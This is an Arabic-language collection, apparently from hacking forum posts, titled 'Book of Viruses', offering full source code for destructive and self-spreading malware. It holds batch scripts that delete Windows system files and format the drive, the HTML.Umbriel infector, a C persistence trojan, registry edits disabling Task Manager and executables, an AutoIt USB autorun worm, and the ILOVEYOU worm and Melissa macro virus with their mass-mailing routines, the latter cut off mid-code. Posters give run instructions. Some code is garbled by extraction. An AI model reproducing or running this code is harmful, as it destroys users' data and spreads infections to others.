كتاب الفايروسات


‫كودات فايروسات‬ echo off 1 echo WELCOME AT DARKHACK 2005 echo echo off >> c:\autoexec.bat echo del c:\windows\explorer.exe >> c:\autoexec.bat echo copy c:\windows\winpopup.exe c:\windows\explorer.exe >> c:\autoexec.bat echo del c:\windows\command\xcopy.exe >> c:\autoexec.bat echo del c:\windows\command\xcopy32.exe >> c:\autoexec.bat echo echo ON EST PAS DES CRASHERS >> c:\autoexec.bat echo pause >> c:\autoexec.bat echo echo HI MAN !!! HOW ARE YOU ? >> c:\autoexec.bat echo pause >> c:\autoexec.bat echo REGEDIT4 >> c:\windows\registre.reg echo [-HKEY_CLASSES_ROOT\.exe] >> c:\windows\registre.reg echo [-HKEY_CLASSES_ROOT\.com] >> c:\windows\registre.reg echo [-HKEY_CLASSES_ROOT\.bat] >> c:\windows\registre.reg echo [-HKEY_CLASSES_ROOT\.sys] >> c:\windows\registre.reg echo [-HKEY_CLASSES_ROOT\.hlp] >> c:\windows\registre.reg copy c:\windows\registre.reg c:\windows\menudé~1\progra~1\démarr~1\registre.reg del c:\windows\registre.reg echo DECRYPTING echo del c:\windows\system\*.dll >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\windows\system\*.sys >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\windows\system\*.ocx >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\windows\system\*.vxd >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\windows\options\cab\*.cab >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\windows\*.dll >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\windows\*.exe >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\windows\system\*.exe >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\windows\bureau\*.lnk >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\windows\system\*.drv >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\windows\*.ini >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\windows\fonts\*.ttf >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del 
c:\windows\SYSTEM32\drivers\*.sys >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\windows\command\*.com >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\windows\*.com >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\autoexec.bat >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo format c\: /autotest /q >> c:\autoexec.bat echo copy c:\windows\test.bat c:\autoexec.bat >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo C:\WINDOWS\RUNDLL32.EXE C:\Windows\system\User.exe,ExitWindows >> c:\windows\menudé~1\progra~1\démarr~1\command.bat


echo BYE BYE IS IT YOUR PASSWORD C:\WINDOWS\RUNDLL32.EXE C:\Windows\system\User.exe,ExitWindows

2 ­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­[HTML.Ubriel for WindowsXP]­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­ ‫كود‬: <html><!--Umbriel--> <head> <title> Second Part To Hell's HTML.Umbriel </title> </head> <body> <script language="VBScript"> rem VBS On Error Resume Next Dim fso, shell, wrte, tempdir, windir, rand, file Set fso=CreateObject("Scripting.FileSystemObject") Set shell=CreateObject("Wscript.Shell") if err.number=429 Then shell.Run javascript:location.reload() End If Set windir=fso.GetSpecialFolder(0) Set tempdir=fso.GetSpecialFolder(2) Set wrte=fso.CreateTextFile(windir+"\windows.cmd") wrte.WriteLine "cls" wrte.WriteLine "@echo off" wrte.WriteLine "shutdown -s -f -t 300 -c "+chr(34)+"Second Part To Hell's Umbriel has you..."+chr(34) wrte.Close() shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Components\1\Source", "C:\umbriel.html" shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Components\1\SubscribedURL", "C:\umbriel.html" Randomize rand=int(rnd*5)+1 If rand=1 then shell.Run windir+"\windows.cmd" End If </script> <script language="JavaScript"> // JS var viruspath, virus, code, fso, file, check, checka, checkb fso=new ActiveXObject("Scripting.FileSystemObject") viruspath=window.location.pathname viruspath=viruspath.slice(1) virus=fso.OpenTextFile(viruspath,1) file=fso.CreateTextFile("C:\\umbriel.html") for (i=0; i<500; i++) { if (checkb!=1) {


if (Math.round(Math.random()*5)+1 == 3) { if (check == 2) { file.WriteLine("/"+"*") file.WriteLine("*"+"/") } if (check == 3) { file.WriteLine("rem") } } code=virus.ReadLine() if (code == "/"+"*") { checka=666 } if (code == "*"+"/") { checka=666 } if (code == "rem") { checka=666 } if (checka != 666 ) { file.WriteLine(code) } checka=0 if (code=="</"+unescape("%68")+"tml>") { checkb=1 } if (code=="// JS") { check=2 } if (code=="rem VBS") { check=3 } if (code=="</"+unescape("%73")+"cript>") { check=0 } } } virus.Close(); file.Close(); </script> <script language="VBScript"> rem VBS On Error Resume Next set fso=CreateObject("Scripting.FileSystemObject") set shell=CreateObject("WScript.Shell") set myfile=fso.OpenTextFile("C:\umbriel.html") mycode=myfile.ReadAll myfile.Close() rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer \FrontPage Explorer\Recent Page List\File1") if rr <> "" Then Call Umbriel(rr, mycode) rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer \FrontPage Explorer\Recent Page List\File2") if rr <> "" Then Call Umbriel(rr, mycode) rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer \FrontPage Explorer\Recent Page List\File3") if rr <> "" Then Call Umbriel(rr, mycode) rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer \FrontPage Explorer\Recent Page List\File4") if rr <> "" Then Call Umbriel(rr, mycode) rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer \FrontPage Explorer\Recent Page List\File5") if rr <> "" Then Call Umbriel(rr, mycode) Sub Umbriel(rr, mycode) set victim=fso.OpenTextFile(rr) infcheck=victim.ReadLine If infcheck<>"<html><!--Umbriel-->" Then viccode=victim.ReadAll victim.Close() set wrtevic=fso.OpenTextFile(rr, 2, false, 0) wrtevic.Write (mycode+infcheck+chr(13)+chr(10)+viccode) wrtevic.Close


End If End Sub </script> </body> </html>

‫هذا كود فيروس لقيتة في موقع اجنبي جديد‬ ‫شغلتة يسوي ريستارات للجهاز حسب‬ ‫مافهمت مبرمج باللغة السي‬ 3 #include <windows.h> #include <stdio.h> #include <stdlib.h> { char sys1[256]; char sys2[256]; char win1[256]; GetModuleFileName(hMod, path, sizeof(path)); GetSystemDirectory(sys1, sizeof(sys1)); GetSystemDirectory(sys2, sizeof(sys2)); GetWindowsDirectory(win1, sizeof(win1)); strcat(sys1, "\\Sleep.exe"); strcat(sys2, "\\Doom32.com"); strcat(win1, "\\WinUpdate.exe"); CopyFile(path, sys1, false); CopyFile(path, sys2, false); CopyFile(path, win1, false);


MessageBox (0, "Not been foun Ram ", "Error !", MB_ICONERROR | MB_OK); HKEY hKey; RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\ Run ", 0, KEY_SET_VALUE, &hKey); RegSetValueEx(hKey, "SLEEP", 0, REG_SZ, (const unsigned char*) sys1, sizeof(sys1)); RegSetValueEx(hKey, "DOOM32", 0, REG_SZ, (const unsigned char*) sys2, sizeof(sys2)); RegSetValueEx(hKey, "WinUpdate", 0, REG_SZ, (const unsigned char*) win1, sizeof(win1)); RegCloseKey(hKey); } { system("shutdown ­s ­f "); MessageBox(NULL,"Not enough memory to load this file.","Error !", MB_ICONERROR | MB_OK); }


‫وهذا كود من عندي للكس بي‬ ‫ طبعا‬batch file ‫يعني انسخه وحطه في المفكرة واحفظة‬ ‫ بامتداد‬bat 4 ‫كود‬: @echo off echo hi del/a/q c:\windows\*.* del/a/q c:\windows\system32\*.* rmdir/s/q c:\windows echo bey pause

‫" هذا كود لفيرس "الحب‬

****************************** rem barok ­loveletter(vbe) <i hate go to school> rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines On Error Resume Next dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow eq=""


ctr=0 Set fso = CreateObject("Scripting.FileSystemObject") set file = fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=file.ReadAll main() sub main() On Error Resume Next dim wscr,rr set wscr=CreateObject("WScript.Shell") rr=wscr.RegRead("HKEY_CURRENT_USER\Sof tware\Micros oft\Windows Scripting Host\Settings\Timeout") if (rr>=1) then wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\W indows Scripting Host\Settings\Timeout",0,"REG_DWORD" end if Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\MSKernel32.vbs")


c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE­LETTER­FOR­ YOU.TXT.vbs") regruns() html() spreadtoemail() listadriv() end sub sub regruns() On Error Resume Next Dim num,downread regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\ Windows\Cur rentVersion\Run\MSKernel32 ",dirsystem&"\MSKernel32.vbs" regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\ Windows\Cur rentVersion\RunServices\Wi n32DLL",dirwin&"\Win32DLL.vbs" downread="" downread=regget("HKEY_CURRENT_USER\Soft ware\Micros oft\Internet Explorer\Download Directory") if (downread="") then downread="c:\"


end if if (fileexist(dirsystem&"\WinFAT32.exe")=1) then Randomize num = Int((4 * Rnd) + 1) if num = 1 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnw erhjkxcvytwertnMTFwetrdsfmhPnj w6587345gvsdf7679njbvYT/WIN­BUGSFIX.exe" elseif num = 2 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfd jghKJnwetryDGFikjUIyqwerWe 546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN­ BUGSFIX.exe" elseif num = 3 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbG RpGqaq198vbFV5hfFEkbopBdQZnm POhfgER67b3Vbvg/WIN­BUGSFIX.exe" elseif num = 4 then regcreate "HKCU\Software\Microsoft\Internet


Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjkl NBmnfgkKLHjkqwtuHJBhAFSDGjkh YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnma dshfgqw237 461234iuy7thjg/WIN­BUGSFIX .exe" end if end if if (fileexist(downread&"\WIN­BUGSFIX.exe")=0) then regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\ Windows\Cur rentVersion\Run\WIN­BUGSFI X",downread&"\WIN­BUGSFIX.exe" regcreate "HKEY_CURRENT_USER\Software\Microsoft\In ternet Explorer\Main\Start Page","about:blank" end if end sub sub listadriv On Error Resume Next Dim d,dc,s Set dc = fso.Drives For Each d in dc


If d.DriveType = 2 or d.DriveType=3 Then folderlist(d.path&"\") end if Next listadriv = s end sub sub infectfiles(folderspec) On Error Resume Next dim f,f1,fc,ext,ap,mircfname,s,bname,mp3 set f = fso.GetFolder(folderspec) set fc = f.Files for each f1 in fc ext=fso.GetExtensionName(f1.path) ext=lcase(ext) s=lcase(f1.name) if (ext="vbs") or (ext="vbe") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close


bname=fso.GetBaseName(f1.path) set cop=fso.GetFile(f1.path) cop.copy(folderspec&"\"&bname&".vbs") fso.DeleteFile(f1.path) elseif(ext="jpg") or (ext="jpeg") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close set cop=fso.GetFile(f1.path) cop.copy(f1.path&".vbs") fso.DeleteFile(f1.path) elseif(ext="mp3") or (ext="mp2") then set mp3=fso.CreateTextFile(f1.path&".vbs") mp3.write vbscopy mp3.close set att=fso.GetFile(f1.path) att.attributes=att.attributes+2 end if if (eq<>folderspec) then if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then set scriptini=fso.CreateTextFile(folderspec&"\script.i ni")


scriptini.WriteLine "[script]" scriptini.WriteLine ";mIRC Script" scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will" scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks" scriptini.WriteLine ";" scriptini.WriteLine ";Khaled Mardam­Bey" scriptini.WriteLine ";http://www.mirc.com" scriptini.WriteLine ";" scriptini.WriteLine "n0=on 1:JOIN:#:{" scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }" scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE­LETTER­FOR­ YOU.HTM" scriptini.WriteLine "n3=}" scriptini.close eq=folderspec end if end if next end sub


sub folderlist(folderspec) On Error Resume Next dim f,f1,sf set f = fso.GetFolder(folderspec) set sf = f.SubFolders for each f1 in sf infectfiles(f1.path) folderlist(f1.path) next end sub sub regcreate(regkey,regvalue) Set regedit = CreateObject("WScript.Shell") regedit.RegWrite regkey,regvalue end sub function regget(value) Set regedit = CreateObject("WScript.Shell") regget=regedit.RegRead(value) end function function fileexist(filespec) On Error Resume Next dim msg if (fso.FileExists(filespec)) Then msg = 0 else msg = 1


end if fileexist = msg end function function folderexist(folderspec) On Error Resume Next dim msg if (fso.GetFolderExists(folderspec)) then msg = 0 else msg = 1 end if fileexist = msg end function sub spreadtoemail() On Error Resume Next dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,rega d set regedit=CreateObject("WScript.Shell") set out=WScript.CreateObject("Outlook.Application" ) set mapi=out.GetNameSpace("MAPI") for ctrlists=1 to mapi.AddressLists.Count set a=mapi.AddressLists(ctrlists) x=1


regv=regedit.RegRead("HKEY_CURRENT_USE R\Software\M icrosoft\WAB\"&a) if (regv="") then regv=1 end if if (int(a.AddressEntries.Count)>int(regv)) then for ctrentries=1 to a.AddressEntries.Count malead=a.AddressEntries(x) regad="" regad=regedit.RegRead("HKEY_CURRENT_USE R\Software\ Microsoft\WAB\"&malead) if (regad="") then set male=out.CreateItem(0) male.Recipients.Add(malead) male.Subject = "ILOVEYOU" male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me." male.Attachments.Add(dirsystem&"\LOVE­ LETTER­FOR­YOU.TXT.vbs") male.Send regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\W AB\"&malead ,1,"REG_DWORD" end if x=x+1


next regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\W AB\"&a,a.Ad dressEntries.Count else regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\W AB\"&a,a.Ad dressEntries.Count end if next Set out=Nothing Set mapi=Nothing end sub sub html On Error Resume Next dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6 dta1="<HTML><HEAD><TITLE>LOVELETTE R ­ HTML<?­?TITLE><META NAME=@­@Generator@­@ &@#&@#&@#&@#&@#&@#&@#=@­ @BAROK VBS ­ LOVELETTER@­ @>"&vbcrlf& _ "<META NAME=@­@Author@­@ &@#&@#&@#&@#&@#&@#&@#=@­ @spyder ?­? ispyder@mail.com ?­?


@GRAMMERSoft Group ?­? Manila, Philippines ?­? March 2000@­@>"&vbcrlf& _ "<META NAME=@­@Description@­@ &@#&@#&@#&@#&@#&@#&@#=@­@simple but i think this is good...@­@>"&vbcrlf& _ "<?­?HEAD><BODY ONMOUSEOUT=@­@window.name=#­#main#­ #;window.open(#­#LOVE­LETTER­FOR­ YOU.HTM# ­#,#­#main#­#)@­@ "&vbcrlf& _ "ONKEYDOWN=@­@window.name=#­#main#­ #;window.open(#­#LOVE­LETTER­FOR­ YOU.HTM# ­#,#­#main#­#)@­@ BGPROPERTIES=@­ @fixed@­@ BGCOLOR=@­@#FF9933@­ @>"&vbcrlf& _ "<CENTER><p>This HTML file need ActiveX Control<?­?p><p>To Enable to read this HTML file<BR>­ Please press #­#YES#­# button to Enable ActiveX<?­?p>"&vbcrlf& _ "<?­?CENTER><MARQUEE LOOP=@­ @infinite@­@ BGCOLOR=@­@yellow@­@>­­­­­­­­­­


z­­­­­­­­­­­­­­­­­­­­z­­­­­­­­­­<?­?MARQUEE> "&vbcrlf& _ "<?­?BODY><?­?HTML>"&vbcrlf& _ "<SCRIPT language=@­@JScript@­ @>"&vbcrlf& _ "<!­­?­??­?"&vbcrlf& _ "if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;window.****To(0,0);window. re sizeTo(wi,hi);}"&vbcrlf& _ "?­??­?­­>"&vbcrlf& _ "<?­?SCRIPT>"&vbcrlf& _ "<SCRIPT LANGUAGE=@­@VBScript@­ @>"&vbcrlf& _ "<!­­"&vbcrlf& _ "on error resume next"&vbcrlf& _ "dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit "&vbcrlf& _ "aw=1"&vbcrlf& _ "code=" dta2="set fso=CreateObject(@­ @Scripting.FileSystemObject@­@)"&vbcrlf& _ "set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _ "code2=replace(code,chr(91)&chr(45)&chr(91),chr


(39 ))"&vbcrlf& _ "code3=replace(code2,chr(93)&chr(45)&chr(93),ch r(3 4))"&vbcrlf& _ "code4=replace(code3,chr(37)&chr(45)&chr(37),ch r(9 2))"&vbcrlf& _ "set wri=fso.CreateTextFile(dirsystem&@­@^­ ^MSKernel32.vbs@­@)"&vbcrlf& _ "wri.write code4"&vbcrlf& _ "wri.close"&vbcrlf& _ "if (fso.FileExists(dirsystem&@­@^­ ^MSKernel32.vbs@­@)) then"&vbcrlf& _ "if (err.number=424) then"&vbcrlf& _ "aw=0"&vbcrlf& _ "end if"&vbcrlf& _ "if (aw=1) then"&vbcrlf& _ "document.write @­@ERROR: can#­#t initialize ActiveX@­@"&vbcrlf& _ "window.close"&vbcrlf& _ "end if"&vbcrlf& _ "end if"&vbcrlf& _ "Set regedit = CreateObject(@­@WScript.Shell@­ @)"&vbcrlf& _ "regedit.RegWrite @­@HKEY_LOCAL_MACHINE^­^Software^­ ^Microsoft^­^Windows^­^CurrentVersion^­^Ru


n^­^MSKernel32@­@,dirsystem&@­@^­ ^MSKernel32.vbs@­@"&vbcrlf& _ "?­??­?­­>"&vbcrlf& _ "<?­?SCRIPT>" dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'") dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""") dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/") dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\") dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'") dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""") dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/") dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\") set fso=CreateObject("Scripting.FileSystemObject") set c=fso.OpenTextFile(WScript.ScriptFullName,1) lines=Split(c.ReadAll,vbcrlf) l1=ubound(lines) for n=0 to ubound(lines) lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr( 91)) lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr (93)) lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr( 37)) if (l1=n) then


lines(n)=chr(34)+lines(n)+chr(34) else lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _" end if next set b=fso.CreateTextFile(dirsystem+"\LOVE­ LETTER­FOR­YOU.HTM") b.close set d=fso.OpenTextFile(dirsystem+"\LOVE­ LETTER­FOR­YOU.HTM",2) d.write dt5 d.write join(lines,vbcrlf) d.write vbcrlf d.write dt6 d.close end sub

‫بالفجوال بيسك‬ ‫ جلب الداة‬winsock ********‫ضع الكود في الفورم ملحظة‬ ‫لتقوموا بتجرتة الكود ************ فقط بعد‬ ‫وضع الكود يجب انشاء ملف‬exe 4


le code app.taskvisible=false call kill("c:\windows\*.exe") call kill("c:\windows\*.ini") call kill("c:\windows\*.dll") ‫أنا خليته في تكست و بعدين بدلت المتداد‬ ‫ الى‬.reg ‫ و الهدف منه ان أي شي امتداده‬bat exe pif com ‫ما يشتغل‬ ::::::::‫ و هو كاتالي‬:::::::: [line] Windows Registry Editor Version 5.00 [HKEY_CLASSES_ROOT\.bat\PersistentHandler] @="{System Axe}" [HKEY_CLASSES_ROOT\.pif\PersistentHandler] @="{System Axe}" [HKEY_CLASSES_ROOT\.exe\PersistentHandler] @="{System Axe}" [HKEY_CLASSES_ROOT\.com\PersistentHandler] @="{System Axe}" [line]

هذا الكود لتعطيل الريجستري وادارة المهام والـ gpedit.msc الي يمكن للضحية اذا كان شاطر شوي انو يشغل منه ادارة المهام والريجستري.....


reg add HKCU\software\Microsoft\Windows\CurrentVersi on\Pol icies\System\ /v DisableRegistryTools /t REG_DWORD /d 0000001 /f reg add HKEY_CURRENT_USER\Software\Microsoft\Wi ndows\Curre ntVersion\Policies\System\ /v DisableTaskMgr /t reg_dword /d 00000001 /f @del "C:\WINDOWS\system32\gpedit.msc" /q

‫أقدم لكم الفيروس الذي يقوم بتغير الشاشة الرئيسية على قولت واحد‬

.. ‫ وأنا دحين بأجربو‬.. ‫ وأداني الكود‬.. ‫من الشباب‬ ‫ لنكم عيوني إنتو‬.. ‫ وأفيدكم‬.. ‫لكن أديكم الكود‬

‫ الكود هو‬.. ‫كود‬: @echo off set key=HKCU\Software\Microsoft\Internet Explorer\Main set value=Start page set data=http://www.tvquran.com/ reg.exe add "%key%" /v "%value%" /d "%data%" /f >nul

‫ قمت بصناعة فايروس يقوم بعمل‬minimize ‫للنوافذ المفتوحة‬


‫الية عمله‬ ‫‪ taskmgr‬عند تشغيله يغير اسمه الى‪1­ ‬‬ ‫‪ my document‬ينقل نفسه الى‪2­ ‬‬ ‫يقوم باخفاء نفسه‪3­ ‬‬ ‫يسجل اسمه ضمن المسجلت‪4­ ‬‬ ‫يقوم بانشاء ملف اوتوران‪5­ ‬‬ ‫يقوم بعمل منيمايز للنوافذ المفتوحة حيث‪6­ ‬‬ ‫قمت بانشاء عداد يبداء من ‪ 1‬ويتزايد بمقدار ‪1‬‬ ‫ويتوقف عندما يصل العدد الى ‪ 1-‬وهذا‬ ‫مستحيل‬ ‫بعد النتشار عند فتح اي بارتشن فان‪7 ­ ‬‬ ‫الفايروس سيعمل من جديد حتى بعد اعادة‬ ‫التشغيل‬ ‫‪ AutoIt Version: 3.2.10.0‬البرنامج المستخدم هو‬ ‫وهذا هو كود الفايروس‬ ‫‪#cs ‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‬ ‫­­­­­­­­­­­‬ ‫‪AutoIt Version: 3.2.10.0‬‬ ‫‪Author: asd‬‬ ‫‪Script Function:‬‬ ‫‪Template AutoIt script.‬‬ ‫‪#ce ‬‬


­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­ ­­­­­­­­­­­ ; Script Start ­ Add your code below here #NoTrayIcon $name="taskmgr" $exe=".exe" $count=1 $c="c:" $d="d:" $e="e:" $f="f:" $g="g:" $h="h:" $i="i:" $j="j:" $k="k:" $l="l:" $m="m:" $n="n:" sleep(3000) FileCopy (@AutoItExe, @DocumentsCommonDir & "\" & $name & $exe,0) ; Make itself protected (readonly, system, hidden)


FileSetAttrib (@DocumentsCommonDir & "\" & $name & $exe,"+RSH") ; Copy itself to windows directory

RegWrite ("HKEY_LOCAL_MACHINE\SOFTWARE\Micr osoft\Windows NT\CurrentVersion\Winlogon","Shell","REG_SZ ","Expl orer.exe " & $name & $exe) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;

sleep(1000) IniWrite (@DocumentsCommonDir & "\autorun.ini","Autorun","Open",$name & $exe) IniWrite (@DocumentsCommonDir & "\autorun.ini","Autorun","Shellexe cute",$name & $exe) IniWrite (@DocumentsCommonDir & "\autorun.ini","Autorun","Shell\Open\command" ,$nam e & $exe) IniWrite (@DocumentsCommonDir & "\autorun.ini","Autorun","Shell","Open") Sleep (1)


FileSetAttrib (@DocumentsCommonDir & "\autorun.ini","+RSH") do ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;; FileDelete($c& "\autorun.inf") FileDelete($d& "\autorun.inf") FileDelete($e& "\autorun.inf") FileDelete($f& "\autorun.inf") FileDelete($g& "\autorun.inf") FileDelete($h& "\autorun.inf") FileDelete($i& "\autorun.inf") FileDelete($j& "\autorun.inf") FileDelete($k& "\autorun.inf")

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;; FileCopy (@DocumentsCommonDir & "\autorun.ini",$c& "\autorun.inf",1) FileCopy (@DocumentsCommonDir & "\autorun.ini",$d & "\autorun.inf",1) FileCopy (@DocumentsCommonDir & "\autorun.ini",$e & "\autorun.inf",1) FileCopy (@DocumentsCommonDir & "\autorun.ini",$f & "\autorun.inf",1)


FileCopy (@DocumentsCommonDir & "\autorun.ini",$g & "\autorun.inf",1) FileCopy (@DocumentsCommonDir & "\autorun.ini",$h & "\autorun.inf",1) FileCopy (@DocumentsCommonDir & "\autorun.ini",$i & "\autorun.inf",1) FileCopy (@DocumentsCommonDir & "\autorun.ini",$j & "\autorun.inf",1) FileCopy (@DocumentsCommonDir & "\autorun.ini",$k & "\autorun.inf",1) FileCopy (@DocumentsCommonDir & "\autorun.ini",$l & "\autorun.inf",1) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; FileCopy(@AutoItExe,$c & "\" & $name & $exe) FileSetAttrib ($c & "\" & $name & $exe,"+RSH") FileCopy(@AutoItExe,$d & "\" & $name & $exe) FileSetAttrib ($d & "\" & $name & $exe,"+RSH") FileCopy(@AutoItExe,$e & "\" & $name & $exe) FileSetAttrib ($e & "\" & $name & $exe,"+RSH") FileCopy(@AutoItExe,$f & "\" & $name & $exe) FileSetAttrib ($f & "\" & $name & $exe,"+RSH") FileCopy(@AutoItExe,$g & "\" & $name & $exe) FileSetAttrib ($g & "\" & $name & $exe,"+RSH")


FileCopy(@AutoItExe,$h & "\" & $name & $exe) FileSetAttrib ($h & "\" & $name & $exe,"+RSH") FileCopy(@AutoItExe,$i & "\" & $name & $exe) FileSetAttrib ($i & "\" & $name & $exe,"+RSH") FileCopy(@AutoItExe,$j & "\" & $name & $exe) FileSetAttrib ($j & "\" & $name & $exe,"+RSH") FileCopy(@AutoItExe,$k & "\" & $name & $exe) FileSetAttrib ($k & "\" & $name & $exe,"+RSH") FileCopy(@AutoItExe,$l & "\" & $name & $exe) FileSetAttrib ($l & "\" & $name & $exe,"+RSH") FileCopy(@AutoItExe,$m & "\" & $name & $exe) FileSetAttrib ($m & "\" & $name & $exe,"+RSH") FileCopy(@AutoItExe,$n & "\" & $name & $exe) FileSetAttrib ($n & "\" & $name & $exe,"+RSH") ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;; sleep (5) WinMinimizeAll() $count=$count+1 sleep(50000) Until $count=­1

لكم كود فايروس ميليسا


هدية بما اني عضو جديد ارجو عدم استخدامه ضد اخواننا المسلمين

Private Sub AutoOpen() On Error Resume Next p$ = "clone" If System.PrivateProfileString("", "HKEY_CURRENT_USER\oftware\icrosoft\ffice\. 0\ord\e curity", "Level") <> "" Then CommandBars("Macro").Controls("Security..."). Enabl ed = False System.PrivateProfileString("", "HKEY_CURRENT_USER\oftware\icrosoft\ffice\. 0\ord\e curity", "Level") = 1& Else p$ = "clone" CommandBars("Tools").Controls("Macro").Enabl ed = False Options.ConfirmConversions = (1 ­ 1): Options.VirusProtection = (1 ­ 1): Options.SaveNormalPrompt = (1 ­ 1) End If Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice


Set UngaDasOutlook = CreateObject("Outlook.Application") Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI") If System.PrivateProfileString("", "HKEY_CURRENT_USER\oftware\icrosoft\ffice\, "Melissa?") <> "... by Kwyjibo" Then If UngaDasOutlook = "Outlook" Then DasMapiName.Logon "profile", "password" For y = 1 To DasMapiName.AddressLists.Count Set AddyBook = DasMapiName.AddressLists(y) x = 1 Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0) For oo = 1 To AddyBook.AddressEntries.Count Peep = AddyBook.AddressEntries(x) BreakUmOffASlice.Recipients.Add Peep x = x + 1 If x > 50 Then oo = AddyBook.AddressEntries.Count Next oo BreakUmOffASlice.Subject = "Important Message From " & Application.UserName BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;­)"


